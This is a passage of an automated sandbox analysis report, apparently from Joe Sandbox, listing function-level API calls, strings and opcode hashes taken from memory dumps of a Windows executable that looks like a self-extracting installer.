    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction ID: d790a69344735d8cc00e6ce73f38b1152093cf03aa4555967f94ffe6d592daaa
    • Opcode Fuzzy Hash: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction Fuzzy Hash: 29816971304747ABEB24DE68C8C1BBE37D59BA230CF00892DFD96CB282DA6489859751
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c3b14570e80e7a6f82c21112f8274555a22f4e1732eda15fd70ab25eaeddc2c4
    • Instruction ID: 9832e9e3b0ab77d77108cc1c5f92308c9929f01d4dad500083fb1de03eafe0ce
    • Opcode Fuzzy Hash: c3b14570e80e7a6f82c21112f8274555a22f4e1732eda15fd70ab25eaeddc2c4
    • Instruction Fuzzy Hash: 4361ABB1240708A6DE388A68D9A1BFF3398EB00704F10052EF993DF2C5DA2DDF599315
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
    • Instruction ID: 1559aa793fcea60ecd7271641f2ffdf844b8ca952815982baea7829eb26d6e02
    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
    • Instruction Fuzzy Hash: DD51AA71600B4497EF348A68C5A67FF27C99B12300F1C092DE9A2DB2E2C61DEF05E756
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74d0c9f6c69cf909c474daf17bd556eb27211e472ca8c54798bbc8bb4c819599
    • Instruction ID: 5efbd6da942b6eb6589a83d5083d88879fd5f39ef1a5f6b82d78a9f73e368962
    • Opcode Fuzzy Hash: 74d0c9f6c69cf909c474daf17bd556eb27211e472ca8c54798bbc8bb4c819599
    • Instruction Fuzzy Hash: 5A51E6315093D64FC711CF28818456EBFE0AE9B358F69099AE5D95B242C230DB4ADB52
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 81697a5365bb60de79f0f2b21fe564eec7597da331353d2b6b952390d6e6fd01
    • Instruction ID: 266f302d06aa324df0f1d9717009e7b16054c82f4e6a17c9c92e1e9485bbf9c9
    • Opcode Fuzzy Hash: 81697a5365bb60de79f0f2b21fe564eec7597da331353d2b6b952390d6e6fd01
    • Instruction Fuzzy Hash: 1351EFB1A087159FC748CF19D48055AF7E1FF88314F098A2EE899E3740DB34EA59CB96
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction ID: b8fa6958c2cd67486d7959b2eca2908ad673406a39a16b60e0032fff164095d3
    • Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction Fuzzy Hash: D631F2B1604B0A9FCB14DF28C89126EBBE0FB96314F14892DE4A6C7742C735E909DB91
    APIs
    • __EH_prolog.LIBCMT ref: 00CAD877
      • Part of subcall function 00CAC4F4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CAC5DB
    • _wcslen.LIBCMT ref: 00CADB3D
    • _wcslen.LIBCMT ref: 00CADB46
    • SetWindowTextW.USER32(?,?), ref: 00CADBA4
    • _wcslen.LIBCMT ref: 00CADBE6
    • _wcsrchr.LIBVCRUNTIME ref: 00CADD2E
    • GetDlgItem.USER32(?,00000066), ref: 00CADD69
    • SetWindowTextW.USER32(00000000,?), ref: 00CADD79
    • SendMessageW.USER32(00000000,00000143,00000000,00CE389A), ref: 00CADD87
    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CADDB2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
    • API String ID: 2804936435-312220925
    • Opcode ID: 86b537fffb90e7c5c242b42105ff205238696fef0ed16ce99059ee0a5d72ba23
    • Instruction ID: 5d4e8cb9800fb2a37d07eef9a1c3f639a61a59705a0334b5e830c298099a17d5
    • Opcode Fuzzy Hash: 86b537fffb90e7c5c242b42105ff205238696fef0ed16ce99059ee0a5d72ba23
    • Instruction Fuzzy Hash: 47E15272900119AADF24DBA4DC85EEE73BCEF06314F5440A6FA1AE7050EE749F84DB60
    APIs
    • _swprintf.LIBCMT ref: 00C9F62E
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
      • Part of subcall function 00CA30E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CD3070,00000200,00C9EC48,00000000,?,00000050,00CD3070), ref: 00CA3102
    • _strlen.LIBCMT ref: 00C9F64F
    • SetDlgItemTextW.USER32(?,00CD0274,?), ref: 00C9F6AF
    • GetWindowRect.USER32(?,?), ref: 00C9F6E9
    • GetClientRect.USER32(?,?), ref: 00C9F6F5
    • GetWindowLongW.USER32(?,000000F0), ref: 00C9F795
    • GetWindowRect.USER32(?,?), ref: 00C9F7C2
    • SetWindowTextW.USER32(?,?), ref: 00C9F7FB
    • GetSystemMetrics.USER32(00000008), ref: 00C9F803
    • GetWindow.USER32(?,00000005), ref: 00C9F80E
    • GetWindowRect.USER32(00000000,?), ref: 00C9F83B
    • GetWindow.USER32(00000000,00000002), ref: 00C9F8AD
    Strings
    Similarity
    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
    • String ID: $%s:$CAPTION$d
    • API String ID: 2407758923-2512411981
    • Opcode ID: 70cdcfa2493bc2a1a3c6c1d034564253a6b430eaac0b1cded52b36200b9ae77a
    • Instruction ID: cc829b28315a8e0356dd8336fe1d0f61a24fae563f615a2f721ae20aac196e2b
    • Opcode Fuzzy Hash: 70cdcfa2493bc2a1a3c6c1d034564253a6b430eaac0b1cded52b36200b9ae77a
    • Instruction Fuzzy Hash: 27818F72208301AFD710DF68CD89B6FBBE9EB89704F04492DFA95D7290D670E905CB52
    APIs
    • ___free_lconv_mon.LIBCMT ref: 00CBDD16
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD8CE
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD8E0
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD8F2
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD904
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD916
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD928
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD93A
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD94C
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD95E
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD970
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD982
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD994
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD9A6
    • _free.LIBCMT ref: 00CBDD0B
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CBDD2D
    • _free.LIBCMT ref: 00CBDD42
    • _free.LIBCMT ref: 00CBDD4D
    • _free.LIBCMT ref: 00CBDD6F
    • _free.LIBCMT ref: 00CBDD82
    • _free.LIBCMT ref: 00CBDD90
    • _free.LIBCMT ref: 00CBDD9B
    • _free.LIBCMT ref: 00CBDDD3
    • _free.LIBCMT ref: 00CBDDDA
    • _free.LIBCMT ref: 00CBDDF7
    • _free.LIBCMT ref: 00CBDE0F
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: fb15f9701a310a9a2961f5b9e97b97a63b6f35d47f83c7582cfe5a904af64f20
    • Instruction ID: 10d92c9bf5e8705ab4fb4d450b5255429aced65234e581179230cc089d634bfd
    • Opcode Fuzzy Hash: fb15f9701a310a9a2961f5b9e97b97a63b6f35d47f83c7582cfe5a904af64f20
    • Instruction Fuzzy Hash: A2312A716006099FEB21AA78D849BDA73E9FF10311F14442AF4EAD7151EE31AE40DB25
    APIs
    • _wcslen.LIBCMT ref: 00CAA6E6
    • _wcslen.LIBCMT ref: 00CAA786
    • GlobalAlloc.KERNEL32(00000040,?), ref: 00CAA795
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CAA7B6
    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CAA7DD
    Strings
    Similarity
    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
    • API String ID: 1777411235-4209811716
    • Opcode ID: 765b0b55faf2761599991f9c5af55768dce42730f64376477eec4e1c9276f6cd
    • Instruction ID: e0f5328b05ee6905e06a9495cdff82e5f4c0164146f7531682d338188c3f8180
    • Opcode Fuzzy Hash: 765b0b55faf2761599991f9c5af55768dce42730f64376477eec4e1c9276f6cd
    • Instruction Fuzzy Hash: 833146321087027EE325AB70DC46FAF77ACEF92714F14052EF511961C1EF64DA49D2A6
    APIs
    • GetWindow.USER32(?,00000005), ref: 00CAE801
    • GetClassNameW.USER32(00000000,?,00000800), ref: 00CAE82D
      • Part of subcall function 00CA3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,00C9D523,00000000,.exe,?,?,00000800,?,?,?,00CA9E4C), ref: 00CA331C
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CAE849
    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CAE860
    • GetObjectW.GDI32(00000000,00000018,?), ref: 00CAE874
    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CAE89D
    • DeleteObject.GDI32(00000000), ref: 00CAE8A4
    • GetWindow.USER32(00000000,00000002), ref: 00CAE8AD
    Strings
    Similarity
    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
    • String ID: STATIC
    • API String ID: 3820355801-1882779555
    • Opcode ID: 147ca5c06a3786d4aee4c650ab6e64c00659d45669f9f78fe076719a9b8e4b48
    • Instruction ID: e46ea9700c695049b34d37ac1fca4b4f94ee13f28dce03dd001c6dd2f5a6d5b1
    • Opcode Fuzzy Hash: 147ca5c06a3786d4aee4c650ab6e64c00659d45669f9f78fe076719a9b8e4b48
    • Instruction Fuzzy Hash: 8711E732504B127BE2216B749C49FBF3A5CAF47714F014025FB51A60D2DB689E0696F6
    APIs
    • _free.LIBCMT ref: 00CBA425
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CBA431
    • _free.LIBCMT ref: 00CBA43C
    • _free.LIBCMT ref: 00CBA447
    • _free.LIBCMT ref: 00CBA452
    • _free.LIBCMT ref: 00CBA45D
    • _free.LIBCMT ref: 00CBA468
    • _free.LIBCMT ref: 00CBA473
    • _free.LIBCMT ref: 00CBA47E
    • _free.LIBCMT ref: 00CBA48C
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 250a93e0add4e5ffc0d0d08cdb07ad19f9c338e1df7f7aaa5701bffafedbcf8f
    • Instruction ID: 3602a1e0bf7f510e3e137e05bf2014c673b15722f9ed1257d1d5c165ffc5749d
    • Opcode Fuzzy Hash: 250a93e0add4e5ffc0d0d08cdb07ad19f9c338e1df7f7aaa5701bffafedbcf8f
    • Instruction Fuzzy Hash: F111B6B651010CBFCB01EF54C956CD93BA5EF14351F5580A6FA5C8F232DA31EE51AB82
    APIs
    Strings
    Similarity
    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 322700389-393685449
    • Opcode ID: a9d124872a72c3c78fcf69e8aeca52a279d59295405a518908cf0d384d521722
    • Instruction ID: e924f42f24ee393f791ee11a73a7c9ef889a28925d828bb76f9b17ca547a72e1
    • Opcode Fuzzy Hash: a9d124872a72c3c78fcf69e8aeca52a279d59295405a518908cf0d384d521722
    • Instruction Fuzzy Hash: 58B17871804209EFCF19EFA8D9819EEBBB5BF14310F14416AF8256B213D731DA51EB92
    APIs
    • __EH_prolog.LIBCMT ref: 00C9C3FC
    • CoCreateInstance.COMBASE(00CC68A0,00000000,00000001,00CC67D0,?), ref: 00C9C41E
    Strings
    Similarity
    • API ID: CreateH_prologInstance
    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
    • API String ID: 457505298-3505469590
    • Opcode ID: 1dc20f680e09736519c8fd8d85b6688810c374b72bfefc5766b4ab6bc1edc7e1
    • Instruction ID: 826a0cf7c078c18b649876bb8b99b4e6f1126e04937c8d029ca7497785828257
    • Opcode Fuzzy Hash: 1dc20f680e09736519c8fd8d85b6688810c374b72bfefc5766b4ab6bc1edc7e1
    • Instruction Fuzzy Hash: CF714B71A00219AFDF18DFA4C8A9EBEB7B9FF48710B15455DE516A72A0CB30AD01DB60
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • EndDialog.USER32(?,00000001), ref: 00CAC7F0
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CAC817
    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CAC830
    • SetWindowTextW.USER32(?,?), ref: 00CAC841
    • GetDlgItem.USER32(?,00000065), ref: 00CAC84A
    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CAC85E
    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CAC874
    Strings
    Similarity
    • API ID: MessageSend$Item$TextWindow$DialogParent
    • String ID: LICENSEDLG
    • API String ID: 4098686847-2177901306
    • Opcode ID: 7c4471b092a09d4ed909a32bbf477e02f82a7f07fbbddf3bd45a170f910db7e0
    • Instruction ID: 0a0e6336806e552417eb08a66971d4d9c15f23b0a547362c7266750190c78143
    • Opcode Fuzzy Hash: 7c4471b092a09d4ed909a32bbf477e02f82a7f07fbbddf3bd45a170f910db7e0
    • Instruction Fuzzy Hash: 6D21A332240602BBE6115B69EC89F7F3B6CFB47B49F054015F711E61A0CB66A901EA72
    APIs
    • _wcslen.LIBCMT ref: 00C9B5E2
      • Part of subcall function 00CA26F1: GetSystemTime.KERNEL32(?), ref: 00CA26FF
      • Part of subcall function 00CA26F1: SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA270D
      • Part of subcall function 00CA269A: __aulldiv.LIBCMT ref: 00CA26A3
    • __aulldiv.LIBCMT ref: 00C9B60E
    • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00C9B615
    • _swprintf.LIBCMT ref: 00C9B640
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • _wcslen.LIBCMT ref: 00C9B64A
    • _swprintf.LIBCMT ref: 00C9B6A0
    • _wcslen.LIBCMT ref: 00C9B6AA
    Strings
    Similarity
    • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
    • String ID: %u.%03u
    • API String ID: 2956649372-1114938957
    • Opcode ID: 561cd8efc55381a3f600aa3057e3781deb7b0cffd6d3654e399ad0991b474cf9
    • Instruction ID: 554cad8c60ba24da70bf91f4bc8ca4f139ae3c15c22a3ba13b6709dbee8ab9ec
    • Opcode Fuzzy Hash: 561cd8efc55381a3f600aa3057e3781deb7b0cffd6d3654e399ad0991b474cf9
    • Instruction Fuzzy Hash: 2A217172A083106BD718EB65DC89DAF77ECEBD4710F044929F555D3241DA30EA0897A6
    APIs
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CABC2F
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CABC40
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CABC4E
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CABC5C
    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CABC77
    • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00CABC9E
    • _swprintf.LIBCMT ref: 00CABCC4
    Strings
    Similarity
    • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
    • String ID: %s %s
    • API String ID: 385609497-2939940506
    • Opcode ID: 53848e167914eff363b96768fe56d7183a361cc19ac4a1117e37c853a65c4ee1
    • Instruction ID: 39ab410c706877c1c647d07cb97e7e0eee072c87325800d3517fb438d14b104d
    • Opcode Fuzzy Hash: 53848e167914eff363b96768fe56d7183a361cc19ac4a1117e37c853a65c4ee1
    • Instruction Fuzzy Hash: 3221C4B254115DABDB25DFA0EC48EEF3BACFF59305F144026FA16D2111E720DA4A9B60
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00C9C43F,00C9C441,00000000,00000000,4B9F516E,00000001,00000000,00000000,00C9C32C,?,?,?,00C9C43F,ROOT\CIMV2), ref: 00CB0F49
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00C9C43F,?,00000000,00000000,?,?,?,?,?,00C9C43F), ref: 00CB0FC4
    • SysAllocString.OLEAUT32(00000000), ref: 00CB0FCF
    • _com_issue_error.COMSUPP ref: 00CB0FF8
    • _com_issue_error.COMSUPP ref: 00CB1002
    • GetLastError.KERNEL32(80070057,4B9F516E,00000001,00000000,00000000,00C9C32C,?,?,?,00C9C43F,ROOT\CIMV2), ref: 00CB1007
    • _com_issue_error.COMSUPP ref: 00CB101A
    • GetLastError.KERNEL32(00000000,?,00C9C43F,ROOT\CIMV2), ref: 00CB1030
    • _com_issue_error.COMSUPP ref: 00CB1043
    Similarity
    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
    • String ID:
    • API String ID: 1353541977-0
    • Opcode ID: 1713f43bfe9bcf1e58da90b7391a1c6b0fcb80fe0d482433e9313ae8600a7085
    • Instruction ID: fb0b25feafccf52d3e56fa1df8acfa58e267606d206867ad58abec855736b01e
    • Opcode Fuzzy Hash: 1713f43bfe9bcf1e58da90b7391a1c6b0fcb80fe0d482433e9313ae8600a7085
    • Instruction Fuzzy Hash: 8A41E9B1A00245AFDB109FA8DC45FEFBBB8EB48710F244229F915E7240D735E9409BA5
    APIs
    • _wcslen.LIBCMT ref: 00CAE8EE
    • ShowWindow.USER32(?,00000000), ref: 00CAEA5D
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00CAEA99
    • CloseHandle.KERNEL32(?), ref: 00CAEABF
    • ShowWindow.USER32(?,00000001), ref: 00CAEB21
    Strings
    Similarity
    • API ID: ShowWindow$CloseCodeExitHandleProcess_wcslen
    • String ID: .exe$.inf
    • API String ID: 783751319-3750412487
    • Opcode ID: cf2c89a7a6d446355a6a63f6590c0aecec5725767f3daa634c6521e5bff5df9f
    • Instruction ID: 620738557c0b3ed07cf2607c7e49b54c1823320d7690cd3491c3dc96ab14258d
    • Opcode Fuzzy Hash: cf2c89a7a6d446355a6a63f6590c0aecec5725767f3daa634c6521e5bff5df9f
    • Instruction Fuzzy Hash: 2051F4311083829EDB309B25E844BBF7BE5AF82748F08481DF5D597190DB708E85DBA6
    APIs
    • __EH_prolog.LIBCMT ref: 00C9A5EE
    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00C9A611
    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00C9A630
      • Part of subcall function 00C9D6A7: _wcslen.LIBCMT ref: 00C9D6AF
      • Part of subcall function 00CA3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,00C9D523,00000000,.exe,?,?,00000800,?,?,?,00CA9E4C), ref: 00CA331C
    • _swprintf.LIBCMT ref: 00C9A6CC
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • MoveFileW.KERNEL32(?,?), ref: 00C9A73B
    • MoveFileW.KERNEL32(?,?), ref: 00C9A77B
    Strings
    Similarity
    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
    • String ID: rtmp%d
    • API String ID: 3726343395-3303766350
    • Opcode ID: 3051d0bad95eba6d7af4ed12737538dc82b7d135350dbf60b60c72444045cb8c
    • Instruction ID: 9b16721ee32060870be575dd0ef3e3925c18ca0c3eb3cdf326ab34cb057b7dd6
    • Opcode Fuzzy Hash: 3051d0bad95eba6d7af4ed12737538dc82b7d135350dbf60b60c72444045cb8c
    • Instruction Fuzzy Hash: C4415C71900669AACF20ABA0CC99FEF737CBF55344F0404A9B555E3046EB349B85EFA1
    APIs
    • __aulldiv.LIBCMT ref: 00CA253E
      • Part of subcall function 00C9C619: GetVersionExW.KERNEL32(?), ref: 00C9C63E
    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00CA2561
    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00CA2573
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CA2584
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA2594
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA25A4
    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CA25DF
    • __aullrem.LIBCMT ref: 00CA2689
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
    • String ID:
    • API String ID: 1247370737-0
    • Opcode ID: bea8c0b79c1885f55ec49a95229e100efc4a791360e5a8250282b84acf13dfe7
    • Instruction ID: 609b94970c02246663742d25a0c203acc7d7077893c129bcb4a05827d0fc747a
    • Opcode Fuzzy Hash: bea8c0b79c1885f55ec49a95229e100efc4a791360e5a8250282b84acf13dfe7
    • Instruction Fuzzy Hash: 404125B24083069FC714DF69D880A6BBBE9FB88314F04892EF5D682210E734E549DB62
    APIs
    Strings
    Similarity
    • API ID: _wcslen
    • String ID: </p>$</style>$<br>$<style>$>
    • API String ID: 176396367-3568243669
    • Opcode ID: 53973498175bef3082e72ea859bd0b0a3422a37ba613f496b9d71c0d73d458df
    • Instruction ID: ace9813f2ceaf881fb1585602432c690b8612ea9bc5f863a5e03af90e2ff715c
